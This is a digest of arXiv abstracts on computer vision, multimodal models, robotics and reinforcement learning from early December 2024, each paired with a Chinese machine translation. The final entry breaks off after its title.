PaintScene4D: Consistent 4D Scene Generation from Text Prompts
Recent advances in diffusion models have revolutionized 2D and 3D content creation, yet generating photorealistic dynamic 4D scenes remains a significant challenge. Existing dynamic 4D generation methods typically rely on distilling knowledge from pre-trained 3D generative models, often fine-tuned on synthetic object datasets. Consequently, the resulting scenes tend to be object-centric and lack photorealism. While text-to-video models can generate more realistic scenes with motion, they often struggle with spatial understanding and provide limited control over camera viewpoints during rendering. To address these limitations, we present PaintScene4D, a novel text-to-4D scene generation framework that departs from conventional multi-view generative models in favor of a streamlined architecture that harnesses video generative models trained on diverse real-world datasets. Our method first generates a reference video using a video generation model, and then employs a strategic camera array selection for rendering. We apply a progressive warping and inpainting technique to ensure both spatial and temporal consistency across multiple viewpoints. Finally, we optimize multi-view images using a dynamic renderer, enabling flexible camera control based on user preferences. Adopting a training-free architecture, our PaintScene4D efficiently produces realistic 4D scenes that can be viewed from arbitrary trajectories. The code will be made publicly available. Our project page is at https://paintscene4d.github.io/
Updated: 2024-12-05 18:59:57
标题: PaintScene4D:从文本提示生成一致的4D场景
摘要: 最近,扩散模型的最新进展已经彻底改变了2D和3D内容的创作,然而生成逼真动态的4D场景仍然是一个重大挑战。现有的动态4D生成方法通常依赖于从预训练的3D生成模型中提取知识,通常在合成对象数据集上进行微调。因此,生成的场景往往以对象为中心,缺乏逼真感。虽然文本到视频模型可以生成更加逼真的具有运动的场景,但它们通常在空间理解方面遇到困难,并在渲染过程中提供有限的摄像机视角控制。为了解决这些限制,我们提出了PaintScene4D,这是一个新颖的文本到4D场景生成框架,它与传统的多视角生成模型不同,而是采用了在多样的现实世界数据集上训练的视频生成模型的简化架构。我们的方法首先使用视频生成模型生成参考视频,然后采用战略摄像机阵列选择进行渲染。我们应用了渐进变形和修补技术,以确保在多个视角之间的空间和时间上的一致性。最后,我们利用动态渲染器优化多视图图像,实现基于用户偏好的灵活摄像机控制。采用无需训练的架构,我们的PaintScene4D高效地产生了可以从任意轨迹查看的逼真4D场景。代码将公开发布。我们的项目页面位于https://paintscene4d.github.io/。
更新时间: 2024-12-05 18:59:57
领域: cs.CV,cs.AI
QUEEN: QUantized Efficient ENcoding of Dynamic Gaussians for Streaming Free-viewpoint Videos
Online free-viewpoint video (FVV) streaming is a challenging problem, which is relatively under-explored. It requires incremental on-the-fly updates to a volumetric representation, fast training and rendering to satisfy real-time constraints and a small memory footprint for efficient transmission. If achieved, it can enhance user experience by enabling novel applications, e.g., 3D video conferencing and live volumetric video broadcast, among others. In this work, we propose a novel framework for QUantized and Efficient ENcoding (QUEEN) for streaming FVV using 3D Gaussian Splatting (3D-GS). QUEEN directly learns Gaussian attribute residuals between consecutive frames at each time-step without imposing any structural constraints on them, allowing for high quality reconstruction and generalizability. To efficiently store the residuals, we further propose a quantization-sparsity framework, which contains a learned latent-decoder for effectively quantizing attribute residuals other than Gaussian positions and a learned gating module to sparsify position residuals. We propose to use the Gaussian viewspace gradient difference vector as a signal to separate the static and dynamic content of the scene. It acts as a guide for effective sparsity learning and speeds up training. On diverse FVV benchmarks, QUEEN outperforms the state-of-the-art online FVV methods on all metrics. Notably, for several highly dynamic scenes, it reduces the model size to just 0.7 MB per frame while training in under 5 sec and rendering at 350 FPS. Project website is at https://research.nvidia.com/labs/amri/projects/queen
Updated: 2024-12-05 18:59:55
标题: 女王:用于流式自由视角视频的动态高斯量化高效编码
摘要: 在线自由视点视频(FVV)流媒体是一个具有挑战性的问题,相对较少被探索。它需要对体积表示进行增量即时更新,快速训练和渲染以满足实时约束,并且需要小的内存占用空间以实现高效传输。如果实现了这一点,可以通过启用新颖的应用程序(例如3D视频会议和实时体积视频广播等)来增强用户体验。在这项工作中,我们提出了一种使用3D高斯栅片(3D-GS)的QUantized and Efficient ENcoding(QUEEN)框架,用于流式传输FVV。QUEEN在每个时间步直接学习连续帧之间的高斯属性残差,而不对它们施加任何结构约束,从而实现高质量的重建和泛化。为了高效存储残差,我们进一步提出了一个量化-稀疏框架,其中包含一个学习的潜在解码器,用于有效量化高斯位置之外的属性残差,以及一个学习的门控模块,用于稀疏化位置残差。我们建议使用高斯视角梯度差向量作为信号,将场景的静态和动态内容分离。它作为有效稀疏学习的指南,并加快训练速度。在各种FVV基准测试中,QUEEN在所有指标上均优于最先进的在线FVV方法。值得注意的是,对于一些高度动态的场景,它将模型大小减小至每帧只有0.7 MB,训练时间不到5秒,渲染速度为350 FPS。项目网站位于https://research.nvidia.com/labs/amri/projects/queen。
更新时间: 2024-12-05 18:59:55
领域: cs.CV,cs.AI
VisionZip: Longer is Better but Not Necessary in Vision Language Models
Recent advancements in vision-language models have enhanced performance by increasing the length of visual tokens, making them much longer than text tokens and significantly raising computational costs. However, we observe that the visual tokens generated by popular vision encoders, such as CLIP and SigLIP, contain significant redundancy. To address this, we introduce VisionZip, a simple yet effective method that selects a set of informative tokens for input to the language model, reducing visual token redundancy and improving efficiency while maintaining model performance. The proposed VisionZip can be widely applied to image and video understanding tasks and is well-suited for multi-turn dialogues in real-world scenarios, where previous methods tend to underperform. Experimental results show that VisionZip outperforms the previous state-of-the-art method by at least 5% performance gains across nearly all settings. Moreover, our method significantly enhances model inference speed, improving the prefilling time by 8x and enabling the LLaVA-Next 13B model to infer faster than the LLaVA-Next 7B model while achieving better results. Furthermore, we analyze the causes of this redundancy and encourage the community to focus on extracting better visual features rather than merely increasing token length. Our code is available at https://github.com/dvlab-research/VisionZip .
Updated: 2024-12-05 18:59:53
标题: VisionZip:在视觉语言模型中,长不一定是更好的
摘要: 最近在视觉语言模型方面的进展通过增加视觉令牌的长度提高了性能,使其比文本令牌长得多,显著提高了计算成本。然而,我们观察到受欢迎的视觉编码器(如CLIP和SigLIP)生成的视觉令牌存在显著的冗余。为了解决这个问题,我们引入了VisionZip,这是一种简单而有效的方法,它选择一组信息丰富的令牌输入到语言模型中,减少了视觉令牌的冗余,提高了效率,同时保持了模型性能。所提出的VisionZip可以广泛应用于图像和视频理解任务,特别适用于真实场景中的多轮对话,而以往的方法往往表现不佳。实验证明,VisionZip在几乎所有设置中的性能至少比以前的最先进方法提高了5%。此外,我们的方法显著提高了模型推断速度,将预填充时间提高了8倍,并使LLaVA-Next 13B模型的推断速度比LLaVA-Next 7B模型更快,同时实现更好的结果。此外,我们分析了这种冗余的原因,并鼓励社区专注于提取更好的视觉特征,而不仅仅是增加令牌长度。我们的代码可在https://github.com/dvlab-research/VisionZip找到。
更新时间: 2024-12-05 18:59:53
领域: cs.CV,cs.AI,cs.CL,cs.LG
Code-as-Monitor: Constraint-aware Visual Programming for Reactive and Proactive Robotic Failure Detection
Automatic detection and prevention of open-set failures are crucial in closed-loop robotic systems. Recent studies often struggle to simultaneously identify unexpected failures reactively after they occur and prevent foreseeable ones proactively. To this end, we propose Code-as-Monitor (CaM), a novel paradigm leveraging the vision-language model (VLM) for both open-set reactive and proactive failure detection. The core of our method is to formulate both tasks as a unified set of spatio-temporal constraint satisfaction problems and use VLM-generated code to evaluate them for real-time monitoring. To enhance the accuracy and efficiency of monitoring, we further introduce constraint elements that abstract constraint-related entities or their parts into compact geometric elements. This approach offers greater generality, simplifies tracking, and facilitates constraint-aware visual programming by leveraging these elements as visual prompts. Experiments show that CaM achieves a 28.7% higher success rate and reduces execution time by 31.8% under severe disturbances compared to baselines across three simulators and a real-world setting. Moreover, CaM can be integrated with open-loop control policies to form closed-loop systems, enabling long-horizon tasks in cluttered scenes with dynamic environments.
Updated: 2024-12-05 18:58:27
标题: 代码作为监视器:面向约束的可视化编程用于反应性和主动式机器人故障检测
摘要: 自动检测和预防开放式故障在闭环机器人系统中至关重要。最近的研究通常难以同时在故障发生后以反应性方式识别意外故障并以预防性方式防止可预见的故障。为此,我们提出了代码作为监视器(CaM),这是一种利用视觉语言模型(VLM)进行开放式反应性和预防性故障检测的新范式。我们方法的核心是将这两个任务都制定为一组统一的时空约束满足问题,并使用VLM生成的代码进行实时监测。为了增强监测的准确性和效率,我们进一步引入抽象约束相关实体或它们的部分为紧凑几何元素的约束元素。这种方法提供了更大的通用性,简化了跟踪,并通过将这些元素作为视觉提示来促进基于约束的视觉编程。实验证明,与基线相比,CaM在三个模拟器和一个真实环境中实现了28.7%更高的成功率,并将执行时间减少了31.8%。此外,CaM可以与开环控制策略集成,形成闭环系统,从而在具有动态环境的拥挤场景中完成长期任务。
更新时间: 2024-12-05 18:58:27
领域: cs.RO,cs.AI,cs.CV,cs.LG
EgoPlan-Bench2: A Benchmark for Multimodal Large Language Model Planning in Real-World Scenarios
The advent of Multimodal Large Language Models, leveraging the power of Large Language Models, has recently demonstrated superior multimodal understanding and reasoning abilities, heralding a new era for artificial general intelligence. However, achieving AGI necessitates more than just comprehension and reasoning. A crucial capability required is effective planning in diverse scenarios, which involves making reasonable decisions based on complex environments to solve real-world problems. Despite its importance, the planning abilities of current MLLMs in varied scenarios remain underexplored. In this paper, we introduce EgoPlan-Bench2, a rigorous and comprehensive benchmark designed to assess the planning capabilities of MLLMs across a wide range of real-world scenarios. EgoPlan-Bench2 encompasses everyday tasks spanning 4 major domains and 24 detailed scenarios, closely aligned with human daily life. EgoPlan-Bench2 is constructed through a semi-automatic process utilizing egocentric videos, complemented by manual verification. Grounded in a first-person perspective, it mirrors the way humans approach problem-solving in everyday life. We evaluate 21 competitive MLLMs and provide an in-depth analysis of their limitations, revealing that they face significant challenges in real-world planning. To further improve the planning proficiency of current MLLMs, we propose a training-free approach using multimodal Chain-of-Thought (CoT) prompting through investigating the effectiveness of various multimodal prompts in complex planning. Our approach enhances the performance of GPT-4V by 10.24 on EgoPlan-Bench2 without additional training. Our work not only sheds light on the current limitations of MLLMs in planning, but also provides insights for future enhancements in this critical area. We have made data and code available at https://qiulu66.github.io/egoplanbench2/.
Updated: 2024-12-05 18:57:23
标题: EgoPlan-Bench2:用于实际场景中多模态大型语言模型规划的基准测试
摘要: 最新的多模态大型语言模型的出现,利用大型语言模型的力量,最近展示了优越的多模态理解和推理能力,预示着人工通用智能的新时代。然而,实现AGI不仅需要理解和推理,还需要有效的规划能力,这涉及在各种场景中基于复杂环境做出合理决策以解决真实世界问题。尽管规划能力的重要性,目前多模态大型语言模型在不同场景中的规划能力尚未得到充分探索。在本文中,我们介绍了EgoPlan-Bench2,这是一个严格和全面的基准,旨在评估多模态大型语言模型在各种真实世界场景中的规划能力。EgoPlan-Bench2包括涵盖4个主要领域和24个详细场景的日常任务,与人类日常生活密切相关。EgoPlan-Bench2通过半自动化过程利用以自我为中心的视频构建,同时进行手动验证。基于第一人称视角,它反映了人类在日常生活中解决问题的方式。我们评估了21个竞争性的多模态大型语言模型,并对它们的局限性进行了深入分析,揭示了它们在真实世界规划中面临的重大挑战。为了进一步提高当前多模态大型语言模型的规划能力,我们提出了一种无需训练的方法,通过调查各种多模态提示在复杂规划中的有效性,使用多模态思维链(CoT)提示。我们的方法将GPT-4V在EgoPlan-Bench2上的表现提高了10.24,而无需额外训练。我们的工作不仅揭示了多模态大型语言模型在规划方面的当前局限性,还为未来在这一关键领域的增强提供了见解。我们已经在https://qiulu66.github.io/egoplanbench2/上提供了数据和代码。
更新时间: 2024-12-05 18:57:23
领域: cs.AI,cs.CV
Moto: Latent Motion Token as the Bridging Language for Robot Manipulation
Recent developments in Large Language Models pre-trained on extensive corpora have shown significant success in various natural language processing tasks with minimal fine-tuning. This success offers new promise for robotics, which has long been constrained by the high cost of action-labeled data. We ask: given the abundant video data containing interaction-related knowledge available as a rich "corpus", can a similar generative pre-training approach be effectively applied to enhance robot learning? The key challenge is to identify an effective representation for autoregressive pre-training that benefits robot manipulation tasks. Inspired by the way humans learn new skills through observing dynamic environments, we propose that effective robotic learning should emphasize motion-related knowledge, which is closely tied to low-level actions and is hardware-agnostic, facilitating the transfer of learned motions to actual robot actions. To this end, we introduce Moto, which converts video content into latent Motion Token sequences by a Latent Motion Tokenizer, learning a bridging "language" of motion from videos in an unsupervised manner. We pre-train Moto-GPT through motion token autoregression, enabling it to capture diverse visual motion knowledge. After pre-training, Moto-GPT demonstrates the promising ability to produce semantically interpretable motion tokens, predict plausible motion trajectories, and assess trajectory rationality through output likelihood. To transfer learned motion priors to real robot actions, we implement a co-fine-tuning strategy that seamlessly bridges latent motion token prediction and real robot control. Extensive experiments show that the fine-tuned Moto-GPT exhibits superior robustness and efficiency on robot manipulation benchmarks, underscoring its effectiveness in transferring knowledge from video data to downstream visual manipulation tasks.
Updated: 2024-12-05 18:57:04
标题: Moto:潜在运动标记作为机器人操纵的桥梁语言
摘要: 最近对大型语言模型在广泛语料库上进行预训练的发展,已经在各种自然语言处理任务中取得了显著成功,并且只需进行最少微调。这一成功为机器人技术带来了新的希望,长期以来,机器人技术一直受到动作标记数据成本高昂的限制。我们提出一个问题:鉴于包含与互动相关知识的大量视频数据可作为丰富的“语料库”,类似的生成式预训练方法能否有效应用于增强机器人学习?关键挑战在于确定一种有效的自回归预训练表示,以有利于机器人操作任务。受到人类通过观察动态环境学习新技能的方式的启发,我们提出,有效的机器人学习应该强调与运动相关的知识,这与低级动作密切相关,并且硬件无关,有助于将学到的运动转移到实际的机器人动作。为此,我们引入了Moto,通过潜在运动令牌分词器将视频内容转换为潜在的运动令牌序列,以无监督的方式从视频中学习运动的“语言”桥接。我们通过运动令牌自回归对Moto-GPT进行预训练,使其能够捕获多样化的视觉运动知识。在预训练之后,Moto-GPT展示了产生语义可解释的运动令牌、预测合理的运动轨迹以及通过输出可能性评估轨迹合理性的有希望的能力。为了将学到的运动先验知识转移到真实的机器人动作,我们实现了一种协同微调策略,无缝地桥接潜在运动令牌预测和真实机器人控制。大量实验表明,经过微调的Moto-GPT在机器人操作基准测试中表现出更优越的鲁棒性和效率,强调了它在将知识从视频数据转移到下游视觉操作任务中的有效性。
更新时间: 2024-12-05 18:57:04
领域: cs.RO,cs.AI,cs.CL,cs.CV,cs.LG
A method to benchmark high-dimensional process drift detection
Process curves are multivariate finite time series data coming from manufacturing processes. This paper studies machine learning that detect drifts in process curve datasets. A theoretic framework to synthetically generate process curves in a controlled way is introduced in order to benchmark machine learning algorithms for process drift detection. An evaluation score, called the temporal area under the curve, is introduced, which allows to quantify how well machine learning models unveil curves belonging to drift segments. Finally, a benchmark study comparing popular machine learning approaches on synthetic data generated with the introduced framework is presented that shows that existing algorithms often struggle with datasets containing multiple drift segments.
Updated: 2024-12-05 18:56:04
标题: 一个用于高维过程漂移检测基准测试的方法
摘要: 过程曲线是来自制造过程的多变量有限时间序列数据。本文研究了机器学习方法,用于检测过程曲线数据集中的漂移。引入了一个理论框架,以控制方式合成过程曲线,以便为过程漂移检测基准机器学习算法。引入了一个评估分数,称为时间曲线下面积,允许量化机器学习模型展示属于漂移部分的曲线的效果。最后,提出了一个基准研究,比较了使用引入的框架生成的合成数据上的流行机器学习方法,结果表明现有算法通常难以处理包含多个漂移段的数据集。
更新时间: 2024-12-05 18:56:04
领域: stat.ML,cs.AI,cs.LG
Masked Autoencoders are PDE Learners
Neural solvers for partial differential equations (PDEs) have great potential to generate fast and accurate physics solutions, yet their practicality is currently limited by their generalizability. PDEs evolve over broad scales and exhibit diverse behaviors; predicting these phenomena will require learning representations across a wide variety of inputs which may encompass different coefficients, boundary conditions, resolutions, or even equations. As a step towards generalizable PDE modeling, we adapt masked pretraining for physics problems. Through self-supervised learning across PDEs, masked autoencoders can consolidate heterogeneous physics to learn rich latent representations. We show that learned representations can generalize to a limited set of unseen equations or parameters and are meaningful enough to regress PDE coefficients or the classify PDE features. Furthermore, conditioning neural solvers on learned latent representations can improve time-stepping and super-resolution performance across a variety of coefficients, discretizations, or boundary conditions, as well as on certain unseen PDEs. We hope that masked pretraining can emerge as a unifying method across large, unlabeled, and heterogeneous datasets to learn latent physics at scale.
Updated: 2024-12-05 18:55:44
标题: 遮蔽自编码器是PDE学习器
摘要: 神经求解器对偏微分方程(PDEs)具有巨大潜力,可以生成快速且准确的物理解,但由于其泛化能力有限,目前在实际中的实用性受到限制。PDEs在广泛的尺度上演变,并表现出多样化的行为;预测这些现象将需要学习跨多种输入的表示,这些输入可能涵盖不同的系数、边界条件、分辨率,甚至方程。作为通用PDE建模的一步,我们为物理问题调整了掩蔽预训练。通过跨PDE的自监督学习,掩蔽自编码器可以整合异质物理学以学习丰富的潜在表示。我们展示了学习到的表示可以泛化到一组有限的未见方程或参数,并且具有足够的含义,可以回归PDE系数或分类PDE特征。此外,将神经求解器置于学习到的潜在表示上可以改善在各种系数、离散化或边界条件下的时间步进和超分辨率性能,以及在某些未见的PDE上。我们希望掩蔽预训练可以成为跨大型、无标签和异质数据集的统一方法,以规模学习潜在的物理学。
更新时间: 2024-12-05 18:55:44
领域: cs.LG
Grounding Descriptions in Images informs Zero-Shot Visual Recognition
Vision-language models (VLMs) like CLIP have been cherished for their ability to perform zero-shot visual recognition on open-vocabulary concepts. This is achieved by selecting the object category whose textual representation bears the highest similarity with the query image. While successful in some domains, this method struggles with identifying fine-grained entities as well as generalizing to unseen concepts that are not captured by the training distribution. Recent works attempt to mitigate these challenges by integrating category descriptions at test time, albeit yielding modest improvements. We attribute these limited gains to a fundamental misalignment between image and description representations, which is rooted in the pretraining structure of CLIP. In this paper, we propose GRAIN, a new pretraining strategy aimed at aligning representations at both fine and coarse levels simultaneously. Our approach learns to jointly ground textual descriptions in image regions along with aligning overarching captions with global image representations. To drive this pre-training, we leverage frozen Multimodal Large Language Models (MLLMs) to derive large-scale synthetic annotations. We demonstrate the enhanced zero-shot performance of our model compared to current state-of-the art methods across 11 diverse image classification datasets. Additionally, we introduce Products-2023, a newly curated, manually labeled dataset featuring novel concepts, and showcase our model's ability to recognize these concepts by benchmarking on it. Significant improvements achieved by our model on other downstream tasks like retrieval further highlight the superior quality of representations learned by our approach. Code available at https://github.com/shaunak27/grain-clip .
Updated: 2024-12-05 18:52:00
标题: 将图像中的描述与零样本视觉识别联系起来
摘要: 视觉语言模型(VLMs)如CLIP因其在开放词汇概念上执行零样本视觉识别的能力而备受推崇。通过选择与查询图像具有最高相似度的物体类别,可以实现这一目标。尽管在某些领域取得成功,但该方法在识别细粒度实体以及推广到未被训练分布捕获的未知概念方面存在困难。最近的研究尝试通过在测试时集成类别描述来缓解这些挑战,尽管效果有限。我们将这些有限的收益归因于图像和描述表示之间的根本不一致,这源于CLIP的预训练结构。本文提出了GRAIN,一种旨在同时对齐细粒度和粗粒度表示的新的预训练策略。我们的方法学习了如何同时将文本描述与图像区域联系起来,并将总体标题与全局图像表示对齐。为了推动这种预训练,我们利用冻结的多模态大语言模型(MLLMs)来生成大规模的合成注释。我们展示了我们的模型在11个不同的图像分类数据集上相对于当前最先进方法的零样本性能的提升。此外,我们介绍了Products-2023,一个新的精心策划的手动标记数据集,展示了我们的模型在该数据集上基准测试的能力。我们的模型在其他下游任务上取得的显著改进进一步突显了我们方法学习的表示的优越质量。代码可在 https://github.com/shaunak27/grain-clip 上找到。
更新时间: 2024-12-05 18:52:00
领域: cs.CV,cs.LG
Marvel: Accelerating Safe Online Reinforcement Learning with Finetuned Offline Policy
The high costs and risks involved in extensive environment interactions hinder the practical application of current online safe reinforcement learning (RL) methods. While offline safe RL addresses this by learning policies from static datasets, the performance therein is usually limited due to reliance on data quality and challenges with out-of-distribution (OOD) actions. Inspired by recent successes in offline-to-online (O2O) RL, it is crucial to explore whether offline safe RL can be leveraged to facilitate faster and safer online policy learning, a direction that has yet to be fully investigated. To fill this gap, we first demonstrate that naively applying existing O2O algorithms from standard RL would not work well in the safe RL setting due to two unique challenges: \emph{erroneous Q-estimations}, resulted from offline-online objective mismatch and offline cost sparsity, and \emph{Lagrangian mismatch}, resulted from difficulties in aligning Lagrange multipliers between offline and online policies. To address these challenges, we introduce \textbf{Marvel}, a novel framework for O2O safe RL, comprising two key components that work in concert: \emph{Value Pre-Alignment} to align the Q-functions with the underlying truth before online learning, and \emph{Adaptive PID Control} to effectively adjust the Lagrange multipliers during online finetuning. Extensive experiments demonstrate that Marvel significantly outperforms existing baselines in both reward maximization and safety constraint satisfaction. By introducing the first policy-finetuning based framework for O2O safe RL, which is compatible with many offline and online safe RL methods, our work has the great potential to advance the field towards more efficient and practical safe RL solutions.
Updated: 2024-12-05 18:51:18
标题: 漫威:通过优化离线策略加速安全的在线强化学习
摘要: 在广泛的环境交互中涉及的高成本和风险阻碍了当前在线安全强化学习(RL)方法的实际应用。虽然离线安全RL通过从静态数据集中学习策略来解决这个问题,但其性能通常受限于数据质量和面临的分布外(OOD)动作挑战。受离线到在线(O2O)RL最近成功的启发,探索离线安全RL是否可以促进更快、更安全的在线策略学习至关重要,这是一个尚未完全研究的方向。为了填补这一空白,我们首先证明了简单地应用现有的标准RL中的O2O算法在安全RL设置中不会很好地工作,原因是存在两个独特挑战:由离线-在线目标不匹配和离线成本稀疏导致的\emph{错误的Q估计},以及由于难以调整离线和在线策略之间的拉格朗日乘子而导致的\emph{拉格朗日不匹配}。为了解决这些挑战,我们引入了\textbf{Marvel},一个用于O2O安全RL的新颖框架,由两个关键组件共同工作:\emph{值预调整}用于在在线学习之前将Q函数与潜在真相对齐,以及\emph{自适应PID控制}用于在在线微调过程中有效调整拉格朗日乘子。大量实验证明Marvel在奖励最大化和安全约束满足方面显著优于现有基线。通过引入第一个基于策略微调的O2O安全RL框架,该框架与许多离线和在线安全RL方法兼容,我们的工作有巨大潜力将该领域推向更高效、更实际的安全RL解决方案。
更新时间: 2024-12-05 18:51:18
领域: cs.LG,cs.AI
CA-SSLR: Condition-Aware Self-Supervised Learning Representation for Generalized Speech Processing
We introduce Condition-Aware Self-Supervised Learning Representation (CA-SSLR), a generalist conditioning model broadly applicable to various speech-processing tasks. Compared to standard fine-tuning methods that optimize for downstream models, CA-SSLR integrates language and speaker embeddings from earlier layers, making the SSL model aware of the current language and speaker context. This approach reduces the reliance on input audio features while preserving the integrity of the base SSLR. CA-SSLR improves the model's capabilities and demonstrates its generality on unseen tasks with minimal task-specific tuning. Our method employs linear modulation to dynamically adjust internal representations, enabling fine-grained adaptability without significantly altering the original model behavior. Experiments show that CA-SSLR reduces the number of trainable parameters, mitigates overfitting, and excels in under-resourced and unseen tasks. Specifically, CA-SSLR achieves a 10% relative reduction in LID errors, a 37% improvement in ASR CER on the ML-SUPERB benchmark, and a 27% decrease in SV EER on VoxCeleb-1, demonstrating its effectiveness.
Updated: 2024-12-05 18:51:10
标题: CA-SSLR:面向广义语音处理的条件感知自监督学习表示
摘要: 我们引入了Condition-Aware Self-Supervised Learning Representation(CA-SSLR),这是一个通用的条件模型,可广泛应用于各种语音处理任务。与优化下游模型的标准微调方法相比,CA-SSLR集成了来自较早层的语言和说话者嵌入,使SSL模型意识到当前的语言和说话者环境。这种方法减少了对输入音频特征的依赖,同时保持了基础SSLR的完整性。CA-SSLR提高了模型的能力,并在未见任务上展示了其普遍性,而且仅需进行最少的任务特定调整。我们的方法采用线性调制来动态调整内部表示,实现细粒度的适应性,而不会显著改变原始模型行为。实验证明,CA-SSLR减少了可训练参数的数量,减轻了过拟合,并在资源稀缺和未见任务中表现出色。具体而言,CA-SSLR在LID错误中实现了10%的相对降低,在ML-SUPERB基准测试中ASR CER提高了37%,在VoxCeleb-1上SV EER减少了27%,展示了其有效性。
更新时间: 2024-12-05 18:51:10
领域: eess.AS,cs.CL,cs.LG,cs.SD
Florence-VL: Enhancing Vision-Language Models with Generative Vision Encoder and Depth-Breadth Fusion
We present Florence-VL, a new family of multimodal large language models (MLLMs) with enriched visual representations produced by Florence-2, a generative vision foundation model. Unlike the widely used CLIP-style vision transformer trained by contrastive learning, Florence-2 can capture different levels and aspects of visual features, which are more versatile to be adapted to diverse downstream tasks. We propose a novel feature-fusion architecture and an innovative training recipe that effectively integrates Florence-2's visual features into pretrained LLMs, such as Phi 3.5 and LLama 3. In particular, we propose "depth-breath fusion (DBFusion)" to fuse the visual features extracted from different depths and under multiple prompts. Our model training is composed of end-to-end pretraining of the whole model followed by finetuning of the projection layer and the LLM, on a carefully designed recipe of diverse open-source datasets that include high-quality image captions and instruction-tuning pairs. Our quantitative analysis and visualization of Florence-VL's visual features show its advantages over popular vision encoders on vision-language alignment, where the enriched depth and breath play important roles. Florence-VL achieves significant improvements over existing state-of-the-art MLLMs across various multi-modal and vision-centric benchmarks covering general VQA, perception, hallucination, OCR, Chart, knowledge-intensive understanding, etc. To facilitate future research, our models and the complete training recipe are open-sourced. https://github.com/JiuhaiChen/Florence-VL
Updated: 2024-12-05 18:50:39
标题: Florence-VL:利用生成视觉编码器和深度广度融合增强视觉语言模型
摘要: 我们提出了Florence-VL,这是一个由Florence-2生成的具有丰富视觉表示的多模态大型语言模型(MLLMs)系列。与广泛使用的通过对比学习训练的CLIP风格视觉变换器不同,Florence-2能够捕捉不同层次和方面的视觉特征,更适合适应不同的下游任务。我们提出了一种新颖的特征融合架构和创新的训练配方,有效地将Florence-2的视觉特征集成到预训练的LLMs(如Phi 3.5和LLama 3)中。特别地,我们提出了“深度广度融合(DBFusion)”来融合从不同深度和多个提示下提取的视觉特征。我们的模型训练包括对整个模型的端到端预训练,然后在精心设计的多样化开源数据集上对投影层和LLM进行微调,这些数据集包括高质量图像标题和指导调整对。我们对Florence-VL的视觉特征进行了定量分析和可视化,显示其在视觉语言对齐方面优于流行的视觉编码器,其中丰富的深度和广度起着重要作用。Florence-VL在各种多模态和以视觉为中心的基准测试中,如通用VQA、感知、幻觉、OCR、图表、知识密集理解等领域,均取得了显著的改进,超越了现有最先进的MLLMs。为了促进未来的研究,我们的模型和完整的训练配方已经开源。
更新时间: 2024-12-05 18:50:39
领域: cs.CV,cs.AI
SmallToLarge (S2L): Scalable Data Selection for Fine-tuning Large Language Models by Summarizing Training Trajectories of Small Models
Despite the effectiveness of data selection for large language models (LLMs) during pretraining and instruction fine-tuning phases, improving data efficiency in supervised fine-tuning (SFT) for specialized domains poses significant challenges due to the complexity of fine-tuning data. To bridge this gap, we introduce an effective and scalable data selection method for SFT, SmallToLarge (S2L), which leverages training trajectories from small models to guide the data selection for larger models. We demonstrate through extensive experiments that S2L significantly improves data efficiency in SFT for mathematical problem-solving, reducing the training data to just 11% of the original MathInstruct dataset (Yue et al., 2023) to match full dataset performance while outperforming state-of-the-art data selection algorithms by an average of 4.7% across 6 in- and out-domain evaluation datasets. Remarkably, selecting only 50K data for SFT, S2L achieves a 32.7% accuracy on the most challenging MATH (Hendrycks et al., 2021) benchmark, improving Phi-2 (Li et al., 2023b) by 16.6%. In clinical text summarization on the MIMIC-III dataset (Johnson et al., 2016), S2L again outperforms training on the full dataset using only 50% of the data. Notably, S2L can perform data selection using a reference model 40x smaller than the target model, proportionally reducing the cost of data selection.
Updated: 2024-12-05 18:47:47
标题: SmallToLarge (S2L):通过总结小型模型的训练轨迹,为微调大型语言模型提供可扩展的数据选择
摘要: 尽管数据选择在大型语言模型(LLMs)的预训练和指导微调阶段中非常有效,但在专业领域的监督微调(SFT)中提高数据效率面临着重大挑战,这是由于微调数据的复杂性。为了弥合这一差距,我们引入了一种有效且可扩展的数据选择方法 SmallToLarge(S2L),该方法利用小模型的训练轨迹来指导更大模型的数据选择。通过大量实验,我们证明了S2L显著提高了数学问题解决中SFT的数据效率,将训练数据减少到原始 MathInstruct 数据集(Yue等,2023年)的仅11%,以匹配全数据集性能,同时在6个领域内外评估数据集中平均优于最先进的数据选择算法4.7%。值得注意的是,仅选择50K数据进行SFT,S2L在最具挑战性的MATH基准(Hendrycks等,2021年)上实现了32.7%的准确率,比Phi-2(Li等,2023b年)提高了16.6%。在MIMIC-III数据集(Johnson等,2016年)上的临床文本摘要中,S2L再次优于仅使用50%数据进行全数据集训练。值得注意的是,S2L可以使用比目标模型小40倍的参考模型进行数据选择,从而成比例地降低数据选择的成本。
更新时间: 2024-12-05 18:47:47
领域: cs.CL,cs.AI,cs.LG
Negative Token Merging: Image-based Adversarial Feature Guidance
Text-based adversarial guidance using a negative prompt has emerged as a widely adopted approach to steer diffusion models away from producing undesired concepts. While useful, performing adversarial guidance using text alone can be insufficient to capture complex visual concepts or avoid specific visual elements like copyrighted characters. In this paper, for the first time we explore an alternate modality in this direction by performing adversarial guidance directly using visual features from a reference image or other images in a batch. We introduce negative token merging (NegToMe), a simple but effective training-free approach which performs adversarial guidance through images by selectively pushing apart matching visual features between reference and generated images during the reverse diffusion process. By simply adjusting the used reference, NegToMe enables a diverse range of applications. Notably, when using other images in same batch as reference, we find that NegToMe significantly enhances output diversity (e.g., racial, gender, visual) by guiding features of each image away from others. Similarly, when used w.r.t. copyrighted reference images, NegToMe reduces visual similarity to copyrighted content by 34.57%. NegToMe is simple to implement using just few-lines of code, uses only marginally higher (<4%) inference time and is compatible with different diffusion architectures, including those like Flux, which don't natively support the use of a negative prompt. Code is available at https://negtome.github.io
Updated: 2024-12-05 18:43:25
标题: 负面令牌合并:基于图像的对抗特征引导
